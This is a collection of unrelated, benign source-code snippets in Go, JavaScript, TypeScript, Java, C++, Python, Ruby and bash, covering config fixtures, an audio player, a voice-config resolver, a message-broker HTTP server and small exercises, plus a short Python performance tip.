Expect(err).To(MatchError(ContainSubstring(`the config file contains unrecognized keys: unrecognized-key, unrecognized-other-key`)))
})
})
})
})
})
const productProperties = `{
".properties.something": {"value": "configure-me"},
".a-job.job-property": {"value": {"identity": "username", "password": "<PASSWORD>"} }
}`
const networkProperties = `{
"singleton_availability_zone": {"name": "az-one"},
"other_availability_zones": [{"name": "az-two" }, {"name": "az-three"}],
"network": {"name": "network-one"}
}`
const syslogProperties = `{
"enabled": true,
"address": "example.com",
"port": 514,
"transport_protocol": "tcp"
}`
const resourceConfig = `{
"some-job": {
"instances": 1,
"persistent_disk": { "size_mb": "20480" },
"instance_type": { "id": "m1.medium" },
"internet_connected": true,
"elb_names": ["some-lb"],
"max_in_flight": "20%"
},
"some-other-job": {
"persistent_disk": { "size_mb": "20480" },
"instance_type": { "id": "m1.medium" },
"max_in_flight": 1
}
}`
const productPropertiesWithVariableTemplate = `---
product-name: cf
product-properties:
.properties.something:
value: configure-me
.a-job.job-property:
value:
identity: username
password: ((password))`
const ymlProductProperties = `---
product-name: cf
product-properties:
.properties.something:
value: configure-me
.a-job.job-property:
value:
identity: username
password: <PASSWORD>
.properties.selector:
value: "Hello World"
option_value: "hello"
.properties.another-selector:
selected_option: "bye"
`
const productOpsFile = `---
- type: replace
path: /product-properties?/.some.property/value
value: some-value
`
const productPropertiesWithOpsFileInterpolated = `{
".properties.something": {"value": "configure-me"},
".a-job.job-property": {"value": {"identity": "username", "password": "<PASSWORD>"} },
".some.property": {"value": "some-value"},
".properties.selector": {"value": "Hello World", "option_value": "hello", "selected_option":"hello"},
".properties.another-selector": {"option_value": "bye", "selected_option":"bye"}
}`
const errandConfigFile = `---
product-name: cf
errand-config:
smoke_tests:
post-deploy-state: true
pre-delete-state: default
push-usage-service:
post-deploy-state: false
pre-delete-state: when-changed
`
|
import { Resource } from "./resource.js";
class Audio
{
timer = null
source = null
file = null
audioCtx = null
shouldStop = false
frequencyData = [0]
init(){
//this.stop();
this.initAudioEngine();
}
initAudioEngine(){
this.audioCtx = new (window.AudioContext || window.webkitAudioContext)(); // define audio context
// Webkit/blink browsers need prefix, Safari won't work without window.
this.analyser = this.audioCtx.createAnalyser();
this.scriptNode = this.audioCtx.createScriptProcessor(1024, 1, 1);
this.source = this.audioCtx.createBufferSource();
this.frequencyData = new Uint8Array(this.analyser.frequencyBinCount);
this.gainNode = this.audioCtx.createGain();
//
this.source.connect(this.analyser);
this.source.connect( this.gainNode);
this.analyser.connect(this.scriptNode);
this.scriptNode.connect(this.audioCtx.destination);
this.gainNode.connect(this.audioCtx.destination)
}
loadAudioFile(data){
if(this.shouldStop) return;
let thisObject = this;
this.audioCtx.decodeAudioData(data,
function(buffer) {
thisObject.play(buffer);
},
function(e){"Error with decoding audio data" + e.err});
}
loadAudioByUrl(url){
this.shouldStop = false;
let that =this;
let xhr =new XMLHttpRequest()
xhr.responseType = 'arraybuffer';
xhr.addEventListener('load',function(){
if(xhr.status ===200){
that.loadAudioFile(xhr.response);
}
}.bind(this));
xhr.open("GET",url);
xhr.send();
}
play(buffer){
var that = this;
that.source.buffer = buffer;
console.log('...............................playBuffer');
that.source.loop = true;
that.source.start(0);
that.gainNode.gain.value = 0;
that.limit = 0.8;
this.timer = setInterval(function () {
if(that.gainNode.gain.value<that.limit){
that.gainNode.gain.value+=0.002;
}else{
clearInterval(that.timer);
}
}, 40);
}
stop(){
if(this.source&&this.source.buffer){
this.source.stop(0) ;
clearInterval(this.timer);
}
this.shouldStop = true;
}
pause(){
this.audioCtx.suspend();
}
resume(){
this.audioCtx.resume();
}
getFreqData(){
if(this.analyser!=null&&this.analyser!=undefined){
this.analyser.getByteFrequencyData(this.frequencyData);
}
return this.frequencyData;
}
};
export {Audio};
|
import * as Domain from "domain_voice-configs";
import {
GuildVoiceConfigRepository,
LayeredVoiceConfigRepository,
LayeredVoiceConfig,
} from "domain_voice-configs-write";
import { randomizers, RandomizerReturnType } from "./randomizer";
const v1v2Boundary = 1598886000000; //2020/09/01 00:00:00 UTC+9
function select<
T extends Record<string, unknown>,
U extends keyof T,
R extends T[U] | undefined
>(
values: (T | undefined)[],
key: U,
defaultValue?: R
): R | Exclude<T[U], null | undefined> {
for (const value of values) {
if (!value) {
continue;
}
const v = value[key] as Exclude<T[U], null | undefined> | null | undefined;
if (v != undefined) {
return v;
}
}
if (arguments.length === 3) {
return defaultValue as R;
}
throw new Error("Not Resolved");
}
function select2<
T extends Record<string, unknown>,
U extends keyof T,
R extends T[U] | undefined
>(
values: [T | undefined, string][],
key: U,
defaultValue?: [R, string]
): { value: R | Exclude<T[U], null | undefined>; provider: string } {
for (const [rawvalue, provider] of values) {
if (!rawvalue) {
continue;
}
const value = rawvalue[key] as
| Exclude<T[U], null | undefined>
| null
| undefined;
if (value != undefined) {
return { value, provider };
}
}
if (arguments.length === 3) {
// eslint-disable-next-line @typescript-eslint/no-non-null-assertion
return { value: defaultValue![0], provider: defaultValue![1] };
}
throw new TypeError("Not Resolvable");
}
function readName(
ms: string | undefined,
us: string | undefined,
nickName: string | undefined,
userName: string
): string {
return ms ?? nickName ?? us ?? userName;
}
type ReadName2ReturnType = { value: string; provider: string };
function readName2(
ms: string | undefined,
us: string | undefined,
nickName: string | undefined,
userName: string
): ReadName2ReturnType {
let value = ms;
let provider = "member";
if (value) {
return { value, provider };
}
value = nickName;
provider = "nickname";
if (value) {
return { value, provider };
}
value = us;
provider = "user";
if (value) {
return { value, provider };
}
value = userName;
provider = "username";
return { value, provider };
}
export interface ContextualDataResolver {
getGuildJoinedTimeStamp(guild: string): Promise<number>;
}
export class Usecase implements Domain.Usecase {
constructor(
private readonly memberVoiceConfig: LayeredVoiceConfigRepository<
[string, string]
>,
private readonly userVoiceConfig: LayeredVoiceConfigRepository<string>,
private readonly guildVoiceConfig: GuildVoiceConfigRepository,
private readonly dictionaryRepo: Domain.DictionaryRepository,
private readonly contextualDataResolver: ContextualDataResolver
) {}
async getUserReadNameResolvedBy(
guild: string,
user: string,
nickname: string | undefined,
username: string
): Promise<[string, string]> {
const { value, provider } = readName2(
(await this.memberVoiceConfig.get([guild, user]))?.readName,
(await this.userVoiceConfig.get(user))?.readName,
nickname,
username
);
return [value, provider];
}
async appliedVoiceConfig(
guild: string,
user: string,
nickName: string | undefined,
userName: string
): Promise<Domain.AppliedVoiceConfig> {
const [mss, uss, gvc] = await Promise.all([
this.memberVoiceConfig.get([guild, user]),
this.userVoiceConfig.get(user),
this.guildVoiceConfig.get(guild),
]);
let randomizerVersion = select([mss, uss, gvc], "randomizer", undefined);
if (!randomizerVersion) {
const joinedTimestamp = await this.contextualDataResolver.getGuildJoinedTimeStamp(
guild
);
randomizerVersion = v1v2Boundary < joinedTimestamp ? "v2" : "v1";
}
const randomizerSupplier = randomizers[randomizerVersion] ?? randomizers.v1;
const randomizer = randomizerSupplier({ user }).get();
const allpass = select([mss, uss, randomizer], "allpass", undefined);
const gws = [mss, uss, randomizer];
return {
dictionary: await this.dictionary(guild),
kind: select(gws, "kind"),
readName: gvc?.readName
? readName(mss?.readName, uss?.readName, nickName, userName)
: undefined,
speed: select(gws, "speed"),
tone: select(gws, "tone"),
volume: Math.min(
gvc?.maxVolume ?? 5,
select(gws, "volume", undefined) ?? 0
),
maxReadLimit: gvc?.maxReadLimit ?? 130,
allpass: allpass,
intone: select(gws, "intone"),
threshold: select(gws, "threshold"),
};
}
async appliedVoiceConfigResolvedBy(
guild: string,
user: string,
nickName: string | undefined,
userName: string
): Promise<Domain.AppliedVoiceConfigResolvedBy> {
const [gvc, mss, uss] = await Promise.all([
this.guildVoiceConfig.get(guild),
this.memberVoiceConfig.get([guild, user]),
this.userVoiceConfig.get(user),
]);
const ms: [LayeredVoiceConfig | undefined, string] = [mss, "member"];
const us: [LayeredVoiceConfig | undefined, string] = [uss, "user"];
let randomizerVersion = select([mss, uss, gvc], "randomizer", undefined);
if (!randomizerVersion) {
const joinedTimestamp = await this.contextualDataResolver.getGuildJoinedTimeStamp(
guild
);
randomizerVersion = v1v2Boundary < joinedTimestamp ? "v2" : "v1";
}
console.log(randomizerVersion);
const randomizerSupplier = randomizers[randomizerVersion] ?? randomizers.v1;
const randomizer = randomizerSupplier({ user });
console.log(randomizer, randomizer.name);
const gws: [
RandomizerReturnType | LayeredVoiceConfig | undefined,
string
][] = [ms, us, [randomizer.get(), randomizer.name]];
const allpass = select2(gws, "allpass", [undefined, "default"]);
const volumegV = gvc?.maxVolume ?? 0;
const volumemu = select2<
RandomizerReturnType | LayeredVoiceConfig,
"volume",
number
>(gws, "volume", [0, "default"]);
let volumeV: number;
let volumeP: string;
const readName = gvc?.readName
? readName2(mss?.readName, uss?.readName, nickName, userName)
: { value: undefined, provider: "server" };
if (volumegV < volumemu.value) {
volumeV = volumegV;
volumeP = "server";
} else {
volumeV = volumemu.value;
volumeP = volumemu.provider;
}
return {
dictionary: {
value: await this.dictionary(guild),
provider: "default",
},
kind: select2(gws, "kind"),
readName,
speed: select2(gws, "speed"),
tone: select2(gws, "tone"),
volume: { value: volumeV, provider: volumeP },
maxReadLimit:
gvc?.maxReadLimit != null
? {
value: gvc.maxReadLimit,
provider: "server",
}
: {
value: 130,
provider: "default",
},
allpass: allpass,
intone: select2(gws, "intone"),
threshold: select2(gws, "threshold"),
};
}
async getUserReadName(
guild: string,
user: string,
nickName: string | undefined,
userName: string
): Promise<string> {
return readName(
(await this.memberVoiceConfig.get([guild, user]))?.readName,
(await this.userVoiceConfig.get(user))?.readName,
nickName,
userName
);
}
dictionary(guild: string): Promise<Domain.Dictionary> {
return this.dictionaryRepo.getAll(guild);
}
}
|
python -m unittest "$@"
|
<gh_stars>1-10
package com.bhm.sdk.rxlibrary.rxjava;
import android.annotation.SuppressLint;
import androidx.annotation.NonNull;
import com.bhm.sdk.rxlibrary.rxjava.callback.RxUpLoadCallBack;
import com.bhm.sdk.rxlibrary.utils.RxUtils;
import java.io.IOException;
import io.reactivex.Observable;
import io.reactivex.android.schedulers.AndroidSchedulers;
import io.reactivex.functions.Consumer;
import okhttp3.MediaType;
import okhttp3.RequestBody;
import okio.Buffer;
import okio.BufferedSink;
import okio.ForwardingSink;
import okio.Okio;
import okio.Sink;
/**
* Created by bhm on 2018/5/28.
*/
public class UpLoadRequestBody extends RequestBody {
private RequestBody mRequestBody;
private RxBuilder rxBuilder;
public UpLoadRequestBody(RequestBody requestBody, RxBuilder builder) {
this.mRequestBody = requestBody;
this.rxBuilder = builder;
}
@Override
public MediaType contentType() {
return mRequestBody.contentType();
}
@Override
public long contentLength() throws IOException {
try {
return mRequestBody.contentLength();
} catch (IOException e) {
e.printStackTrace();
return -1;
}
}
@Override
public void writeTo(@NonNull BufferedSink sink) throws IOException {
BufferedSink bufferedSink;
CountingSink mCountingSink = new CountingSink(sink);
bufferedSink = Okio.buffer(mCountingSink);
mRequestBody.writeTo(bufferedSink);
bufferedSink.flush();
}
class CountingSink extends ForwardingSink {
private long bytesWritten = 0L;
private long contentLength = 0L;
CountingSink(Sink delegate) {
super(delegate);
}
@SuppressLint("CheckResult")
@Override
public void write(@NonNull Buffer source, final long byteCount) throws IOException {
super.write(source, byteCount);
if (null != rxBuilder && null != rxBuilder.getListener() &&
rxBuilder.getListener() instanceof RxUpLoadCallBack) {
if(contentLength == 0L){
contentLength = contentLength();
}
if (bytesWritten == 0) {
Observable.just(bytesWritten)
.observeOn(AndroidSchedulers.mainThread())
.subscribe(new Consumer<Long>() {
@Override
public void accept(Long aLong) throws Exception {
rxBuilder.getListener().onStart();
RxUtils.Logger(rxBuilder, "upLoad-- > ", "begin upLoad");
}
});
}
bytesWritten += byteCount;
final int progress = (int) (bytesWritten * 100 / contentLength);
Observable.just(bytesWritten)
.observeOn(AndroidSchedulers.mainThread())
.subscribe(new Consumer<Long>() {
@Override
public void accept(Long aLong) throws Exception {
// rxBuilder.getListener().onProgress(progress, byteCount, contentLength);
rxBuilder.getListener().onProgress(progress > 100 ?
100 : progress, byteCount, contentLength);
}
});
}
}
}
}
|
<reponame>pnkfb9/gem5_priority<gh_stars>0
#include "dvfs.hh"
#include <cassert>
using namespace std;
Dvfs::Dvfs(DvfsParams *p) : SimObject(p), recreateFiles(p->recreateFiles)
{
assert(theInstance==0); //Don't call it twice
theInstance=this;
}
Dvfs *Dvfs::instance()
{
//assert(theInstance); //Has to exist
return theInstance;
}
void Dvfs::configure(int numRouters)
{
totalRouterPower.resize(numRouters,0);
staticRouterPower.resize(numRouters,0);
dynamicRouterPower.resize(numRouters,0);
clockRouterPower.resize(numRouters,0);
routerFrequency.resize(numRouters,0);
routerVoltage.resize(numRouters,0);
routerTemperature.resize(numRouters,0);
updateCounter=0;
}
void Dvfs::configureCpu(int numCpus)
{
cpuFrequency.resize(numCpus,0);
cpuVoltage.resize(numCpus,0);
cpuTemperature.resize(numCpus,0);
}
int Dvfs::getUpdateCounter() { return updateCounter; }
int Dvfs::getNumRouters() { return totalRouterPower.size(); }
int Dvfs::getNumCpus() { return cpuFrequency.size(); }
double Dvfs::getTotalRouterPower(int i) { return totalRouterPower.at(i); }
double Dvfs::getStaticRouterPower(int i) { return staticRouterPower.at(i); }
double Dvfs::getDynamicRouterPower(int i) { return dynamicRouterPower.at(i); }
double Dvfs::getClockRouterPower(int i) { return clockRouterPower.at(i); }
double Dvfs::getAverageRouterFrequency(int i) { return routerFrequency.at(i); }
double Dvfs::getAverageCpuFrequency(int i) { return cpuFrequency.at(i); }
double Dvfs::getAverageRouterVoltage(int i) { return routerVoltage.at(i); }
double Dvfs::getAverageCpuVoltage(int i) { return cpuVoltage.at(i); }
void Dvfs::setCpuTemperature(int i, double t) { cpuTemperature.at(i)=t; }
void Dvfs::setRouterTemperature(int i, double t) { routerTemperature.at(i)=t; }
void Dvfs::runThermalPolicy()
{
if(thermalPolicyCallback) thermalPolicyCallback(this);
// for(int i=0;i<cpuTemperature.size();i++)
// cout<<"cpu"<<i<<" "<<cpuTemperature.at(i)<<endl;
// for(int i=0;i<routerTemperature.size();i++)
// cout<<"router"<<i<<" "<<routerTemperature.at(i)<<endl;
}
Dvfs::~Dvfs() {}
Dvfs *Dvfs::theInstance=0;
//
Dvfs *DvfsParams::create()
{
return new Dvfs(this);
}
|
#include <iostream>
int sumEven(int arr[], int size)
{
int sum = 0;
for (int i = 0; i < size; i++)
{
if (arr[i] % 2 == 0)
sum += arr[i];
}
return sum;
}
int main()
{
int arr[] = {2, 3, 5, 6, 8, 9};
int size = sizeof(arr) / sizeof(arr[0]);
int sum = sumEven(arr, size);
std::cout << "Sum of even numbers = " << sum;
return 0;
}
|
def count_words(text):
words = text.lower().split()
wordcount = {}
for word in words:
if word in wordcount.keys():
wordcount[word] += 1
else:
wordcount[word] = 1
return wordcount
def most_frequent(wordcount):
most_frequent_word = ''
max_count = 0
for word, count in wordcount.items():
if count > max_count:
most_frequent_word = word
max_count = count
return (most_frequent_word, max_count)
text = 'The quick brown fox jumps over the lazy dog.'
wordcount = count_words(text)
most_frequent_word, max_count = most_frequent(wordcount)
print('Most frequent word:', most_frequent_word, 'with frequency', max_count)
|
package engine
import (
"errors"
"fmt"
"github.com/gin-gonic/gin"
fl "github.com/korableg/flow"
"github.com/korableg/flow/errs"
"github.com/korableg/flow/leveldb"
"github.com/korableg/flow/repo"
"github.com/korableg/mini-gin/config"
"net/http"
"strconv"
)
var engine *gin.Engine
var flow *fl.Flow
func init() {
if config.Debug() {
gin.SetMode(gin.DebugMode)
} else {
gin.SetMode(gin.ReleaseMode)
}
var db repo.DB
switch config.DBProvider() {
case "leveldb":
db = leveldb.New(config.LevelDB().Path)
}
engine = gin.New()
engine.Use(defaultHeaders())
engine.NoRoute(pageNotFound)
engine.NoMethod(methodNotAllowed)
engine.GET("/node", getAllNodes)
engine.GET("/node/:name", getNode)
engine.POST("/node/:name", newNode)
engine.DELETE("/node/:name", deleteNode)
engine.GET("/hub", getAllHubs)
engine.GET("/hub/:name", getHub)
engine.POST("/hub/:name", newHub)
engine.PATCH("/hub/:action/:nameHub/:nameNode", patchHub)
engine.DELETE("/hub/:name", deleteHub)
engine.POST("/message/tohub/:nodeFrom/:hubTo", sendMessageToHub)
engine.POST("/message/tonode/:nodeFrom/:nodeTo", sendMessageToNode)
engine.GET("/message/:name", getMessage)
engine.DELETE("/message/:name", deleteMessage)
flow = fl.New(db)
}
func Run() {
go func() {
err := engine.Run(config.Address())
if err != nil && err != http.ErrServerClosed {
panic(err)
}
}()
}
func Close() error {
return flow.Close()
}
func defaultHeaders() gin.HandlerFunc {
return func(c *gin.Context) {
c.Header("Server", fmt.Sprintf("Flow:%s", config.Version()))
}
}
func pageNotFound(c *gin.Context) {
c.JSON(http.StatusNotFound, errs.New(errs.ErrPageNotFound))
}
func methodNotAllowed(c *gin.Context) {
c.JSON(http.StatusMethodNotAllowed, errs.New(errors.New("method is not allowed")))
}
func getAllNodes(c *gin.Context) {
nodes := flow.GetAllNodes()
c.JSON(http.StatusOK, nodes)
}
func getNode(c *gin.Context) {
name := c.Params.ByName("name")
c.JSON(http.StatusOK, flow.GetNode(name))
}
func newNode(c *gin.Context) {
name := c.Params.ByName("name")
careful := c.Query("careful") == "true"
if n, err := flow.NewNode(name, careful); err == nil {
c.JSON(http.StatusCreated, n)
} else {
c.JSON(http.StatusBadRequest, errs.New(err))
}
}
func deleteNode(c *gin.Context) {
name := c.Params.ByName("name")
if err := flow.DeleteNode(name); err != nil {
c.JSON(http.StatusInternalServerError, errs.New(err))
return
}
c.Status(http.StatusOK)
}
func getAllHubs(c *gin.Context) {
hubs := flow.GetAllHubs()
c.JSON(http.StatusOK, hubs)
}
func getHub(c *gin.Context) {
name := c.Params.ByName("name")
c.JSON(http.StatusOK, flow.GetHub(name))
}
func newHub(c *gin.Context) {
name := c.Params.ByName("name")
if n, err := flow.NewHub(name); err == nil {
c.JSON(http.StatusCreated, n)
} else {
c.JSON(http.StatusBadRequest, errs.New(err))
}
}
func patchHub(c *gin.Context) {
nameHub := c.Params.ByName("nameHub")
nameNode := c.Params.ByName("nameNode")
action := c.Params.ByName("action")
var err error
switch action {
case "addnode":
err = flow.AddNodeToHub(nameHub, nameNode)
case "deletenode":
err = flow.DeleteNodeFromHub(nameHub, nameNode)
default:
err = errs.New(errors.New("action not allowed"))
}
if err != nil {
c.JSON(http.StatusBadRequest, errs.New(err))
return
}
c.JSON(http.StatusOK, flow.GetHub(nameHub))
}
func deleteHub(c *gin.Context) {
name := c.Params.ByName("name")
if err := flow.DeleteHub(name); err != nil {
c.JSON(http.StatusInternalServerError, errs.New(err))
return
}
c.Status(http.StatusOK)
}
func sendMessageToHub(c *gin.Context) {
nodeFrom := c.Params.ByName("nodeFrom")
hubTo := c.Params.ByName("hubTo")
data, err := c.GetRawData()
if err != nil {
c.JSON(http.StatusInternalServerError, errs.New(err))
return
}
_, err = flow.SendMessageToHub(nodeFrom, hubTo, data)
if err != nil {
c.JSON(http.StatusBadRequest, errs.New(err))
}
c.Status(http.StatusOK)
}
func sendMessageToNode(c *gin.Context) {
nodeFrom := c.Params.ByName("nodeFrom")
nodeTo := c.Params.ByName("nodeTo")
data, err := c.GetRawData()
if err != nil {
c.JSON(http.StatusInternalServerError, errs.New(err))
return
}
_, err = flow.SendMessageToNode(nodeFrom, nodeTo, data)
if err != nil {
c.JSON(http.StatusBadRequest, errs.New(err))
}
c.Status(http.StatusOK)
}
func getMessage(c *gin.Context) {
name := c.Params.ByName("name")
m, err := flow.GetMessage(name)
if err != nil {
c.JSON(http.StatusBadRequest, errs.New(err))
return
}
if m == nil {
c.Status(http.StatusNoContent)
return
}
contentLength, err := c.Writer.Write(m.Data())
if err != nil {
c.JSON(http.StatusInternalServerError, errs.New(err))
return
}
c.Header("Message-ID", strconv.FormatInt(m.ID(), 16))
c.Header("Message-From", m.From())
c.Header("Content-Type", "application/octet-stream")
c.Header("Content-Length", strconv.Itoa(contentLength))
c.Status(http.StatusOK)
}
func deleteMessage(c *gin.Context) {
name := c.Params.ByName("name")
err := flow.RemoveMessage(name)
if err != nil {
c.JSON(http.StatusBadRequest, errs.New(err))
return
}
c.Status(http.StatusOK)
}
|
One suggestion to optimize the runtime of a program written in Python is to use vectorized operations with NumPy where possible, as it can offer significant performance gains over native Python code. Additionally, use data structures such as dictionaries, sets and lists, where appropriate, as they can help improve lookup time and memory efficiency. Furthermore, implementing memoization, or caching of intermediate results, can greatly reduce the runtime performance of a program. Finally, use python profiling tools to identify and optimize code sections or functions which are the slowest.
|
<gh_stars>0
package org.gbif.pipelines.estools;
import java.util.Collections;
import org.gbif.pipelines.estools.client.EsConfig;
import org.hamcrest.CoreMatchers;
import org.junit.Rule;
import org.junit.Test;
import org.junit.rules.ExpectedException;
/** Unit tests for {@link EsIndex}. */
public class EsIndexTest {
private static final String DUMMY_HOST = "http://dummy.com";
/** {@link Rule} requires this field to be public. */
@Rule
public ExpectedException thrown = ExpectedException.none();
@Test(expected = IllegalArgumentException.class)
public void swapIndexInAliasNullAliasTest() {
// When
EsIndex.swapIndexInAliases(EsConfig.from(DUMMY_HOST), null, "index_1");
// Should
thrown.expectMessage("aliases are required");
}
@Test(expected = IllegalArgumentException.class)
public void swapIndexInAliasEmptyAliasTest() {
// When
EsIndex.swapIndexInAliases(EsConfig.from(DUMMY_HOST), Collections.singleton(""), "index_1");
// Should
thrown.expectMessage("aliases are required");
}
@Test(expected = IllegalArgumentException.class)
public void swapIndexInAliasNullIndexTest() {
// When
EsIndex.swapIndexInAliases(EsConfig.from(DUMMY_HOST), Collections.singleton("alias"), null);
// Should
thrown.expectMessage("index is required");
}
@Test(expected = IllegalArgumentException.class)
public void swapIndexInAliasEmptyIndexTest() {
// When
EsIndex.swapIndexInAliases(EsConfig.from(DUMMY_HOST), Collections.singleton("alias"), "");
// Should
thrown.expectMessage("index is required");
}
@Test(expected = IllegalArgumentException.class)
public void swapIndexInAliasWrongFormatIndexTest() {
// When
EsIndex.swapIndexInAliases(EsConfig.from(DUMMY_HOST), Collections.singleton("alias"), "index");
// Should
thrown.expectMessage(CoreMatchers.containsString("index has to follow the pattern"));
}
@Test(expected = IllegalArgumentException.class)
public void countIndexDocumentsNullIndexTest() {
// When
EsIndex.countDocuments(EsConfig.from(DUMMY_HOST), null);
// Should
thrown.expectMessage("index is required");
}
@Test(expected = IllegalArgumentException.class)
public void countIndexDocumentsEmptyIndexTest() {
// When
EsIndex.countDocuments(EsConfig.from(DUMMY_HOST), "");
// Should
thrown.expectMessage("index is required");
}
}
|
package json
import (
"errors"
"strings"
"github.com/spyzhov/ajson"
)
func EvalExpr(json string, expr string) (string, error) {
root := ajson.Must(ajson.Unmarshal([]byte(json)))
_, err := ajson.Eval(root, expr)
if err != nil {
return "", err
}
result := ajson.Must(ajson.Eval(root, expr))
return result.String(), nil
}
func Exists(json string, expr string) (bool, error) {
root := ajson.Must(ajson.Unmarshal([]byte(json)))
result, err := ajson.Eval(root, expr)
if err != nil {
return false, err
}
if strings.Contains(result.String(), "null") {
return false, errors.New("Expression " + expr + " evaluates to null.")
}
return true, nil
}
|
class AddBandChangeToBatChanges < ActiveRecord::Migration
def self.up
add_column :bat_changes, :old_band_name, :string
add_column :bat_changes, :new_band_name, :string
end
def self.down
remove_column :bat_changes, :old_band_name
remove_column :bat_changes, :new_band_name
end
end
|
#!/bin/bash
exec >>bash.log
exec 2>>bash.log
exec 5> bash.log
export BASH_XTRACEFD=5
set -x
sh analyze_simple_1624.sh 1624A/1 1624A/1
sh analyze_simple_1624.sh 1624A/2 1624A/2
sh analyze_simple_1624.sh 1624A/2 1624A/12
sh analyze_simple_1624.sh 1624A/2 1624A/13
sh analyze_simple_1624.sh 1624A/2 1624A/14
sh analyze_simple_1624.sh 1624A/2 1624A/15
sh analyze_simple_1624.sh 1624A/2 1624A/16
sh analyze_simple_1624.sh 1624A/2 1624A/17
sh analyze_simple_1624.sh 1624A/2 1624A/18
sh analyze_simple_1624.sh 1624A/2 1624A/19
sh analyze_simple_1624.sh 1624A/2 1624A/20
sh analyze_simple_1624.sh 1624A/2 1624A/21
sh analyze_simple_1624.sh 1624A/2 1624A/22
sh analyze_simple_1624.sh 1624A/2 1624A/23
sh analyze_simple_1624.sh 1624A/3 1624A/1
sh analyze_simple_1624.sh 1624A/3 1624A/2
sh analyze_simple_1624.sh 1624A/3 1624A/4
sh analyze_simple_1624.sh 1624A/3 1624A/5
sh analyze_simple_1624.sh 1624A/3 1624A/6
sh analyze_simple_1624.sh 1624A/3 1624A/7
sh analyze_simple_1624.sh 1624A/3 1624A/8
sh analyze_simple_1624.sh 1624A/3 1624A/9
sh analyze_simple_1624.sh 1624A/3 1624A/10
sh analyze_simple_1624.sh 1624A/3 1624A/11
sh analyze_simple_1624.sh 1624A/3 1624A/12
sh analyze_simple_1624.sh 1624A/3 1624A/13
sh analyze_simple_1624.sh 1624A/3 1624A/14
sh analyze_simple_1624.sh 1624A/3 1624A/15
sh analyze_simple_1624.sh 1624A/3 1624A/16
sh analyze_simple_1624.sh 1624A/3 1624A/17
sh analyze_simple_1624.sh 1624A/3 1624A/18
sh analyze_simple_1624.sh 1624A/3 1624A/19
sh analyze_simple_1624.sh 1624A/3 1624A/20
sh analyze_simple_1624.sh 1624A/3 1624A/21
sh analyze_simple_1624.sh 1624A/3 1624A/22
sh analyze_simple_1624.sh 1624A/3 1624A/23
sh analyze_simple_1624.sh 1624A/4 1624A/1
sh analyze_simple_1624.sh 1624A/4 1624A/2
sh analyze_simple_1624.sh 1624A/4 1624A/3
sh analyze_simple_1624.sh 1624A/4 1624A/5
sh analyze_simple_1624.sh 1624A/4 1624A/6
sh analyze_simple_1624.sh 1624A/4 1624A/7
sh analyze_simple_1624.sh 1624A/4 1624A/8
sh analyze_simple_1624.sh 1624A/4 1624A/9
sh analyze_simple_1624.sh 1624A/4 1624A/10
sh analyze_simple_1624.sh 1624A/4 1624A/11
sh analyze_simple_1624.sh 1624A/4 1624A/12
sh analyze_simple_1624.sh 1624A/4 1624A/13
sh analyze_simple_1624.sh 1624A/4 1624A/14
sh analyze_simple_1624.sh 1624A/4 1624A/15
sh analyze_simple_1624.sh 1624A/4 1624A/16
sh analyze_simple_1624.sh 1624A/4 1624A/17
sh analyze_simple_1624.sh 1624A/4 1624A/18
sh analyze_simple_1624.sh 1624A/4 1624A/19
sh analyze_simple_1624.sh 1624A/4 1624A/20
sh analyze_simple_1624.sh 1624A/4 1624A/21
sh analyze_simple_1624.sh 1624A/4 1624A/22
sh analyze_simple_1624.sh 1624A/4 1624A/23
sh analyze_simple_1624.sh 1624A/5 1624A/1
sh analyze_simple_1624.sh 1624A/5 1624A/2
sh analyze_simple_1624.sh 1624A/5 1624A/3
sh analyze_simple_1624.sh 1624A/5 1624A/4
sh analyze_simple_1624.sh 1624A/5 1624A/6
sh analyze_simple_1624.sh 1624A/5 1624A/7
sh analyze_simple_1624.sh 1624A/5 1624A/8
sh analyze_simple_1624.sh 1624A/5 1624A/9
sh analyze_simple_1624.sh 1624A/5 1624A/10
sh analyze_simple_1624.sh 1624A/5 1624A/11
sh analyze_simple_1624.sh 1624A/5 1624A/12
sh analyze_simple_1624.sh 1624A/5 1624A/13
sh analyze_simple_1624.sh 1624A/5 1624A/14
sh analyze_simple_1624.sh 1624A/5 1624A/15
sh analyze_simple_1624.sh 1624A/5 1624A/16
sh analyze_simple_1624.sh 1624A/5 1624A/17
sh analyze_simple_1624.sh 1624A/5 1624A/18
sh analyze_simple_1624.sh 1624A/5 1624A/19
sh analyze_simple_1624.sh 1624A/5 1624A/20
sh analyze_simple_1624.sh 1624A/5 1624A/21
sh analyze_simple_1624.sh 1624A/5 1624A/22
sh analyze_simple_1624.sh 1624A/5 1624A/23
sh analyze_simple_1624.sh 1624A/6 1624A/1
sh analyze_simple_1624.sh 1624A/6 1624A/2
sh analyze_simple_1624.sh 1624A/6 1624A/3
sh analyze_simple_1624.sh 1624A/6 1624A/4
sh analyze_simple_1624.sh 1624A/6 1624A/5
sh analyze_simple_1624.sh 1624A/6 1624A/7
sh analyze_simple_1624.sh 1624A/6 1624A/8
sh analyze_simple_1624.sh 1624A/6 1624A/9
sh analyze_simple_1624.sh 1624A/6 1624A/10
sh analyze_simple_1624.sh 1624A/6 1624A/11
sh analyze_simple_1624.sh 1624A/6 1624A/12
sh analyze_simple_1624.sh 1624A/6 1624A/13
sh analyze_simple_1624.sh 1624A/6 1624A/14
sh analyze_simple_1624.sh 1624A/6 1624A/15
sh analyze_simple_1624.sh 1624A/6 1624A/16
sh analyze_simple_1624.sh 1624A/6 1624A/17
sh analyze_simple_1624.sh 1624A/6 1624A/18
sh analyze_simple_1624.sh 1624A/6 1624A/19
sh analyze_simple_1624.sh 1624A/6 1624A/20
sh analyze_simple_1624.sh 1624A/6 1624A/21
sh analyze_simple_1624.sh 1624A/6 1624A/22
sh analyze_simple_1624.sh 1624A/6 1624A/23
sh analyze_simple_1624.sh 1624A/7 1624A/1
sh analyze_simple_1624.sh 1624A/7 1624A/2
sh analyze_simple_1624.sh 1624A/7 1624A/3
sh analyze_simple_1624.sh 1624A/7 1624A/4
sh analyze_simple_1624.sh 1624A/7 1624A/5
sh analyze_simple_1624.sh 1624A/7 1624A/6
sh analyze_simple_1624.sh 1624A/7 1624A/8
sh analyze_simple_1624.sh 1624A/7 1624A/9
sh analyze_simple_1624.sh 1624A/7 1624A/10
sh analyze_simple_1624.sh 1624A/7 1624A/11
sh analyze_simple_1624.sh 1624A/7 1624A/12
sh analyze_simple_1624.sh 1624A/7 1624A/13
sh analyze_simple_1624.sh 1624A/7 1624A/14
sh analyze_simple_1624.sh 1624A/7 1624A/15
sh analyze_simple_1624.sh 1624A/7 1624A/16
sh analyze_simple_1624.sh 1624A/7 1624A/17
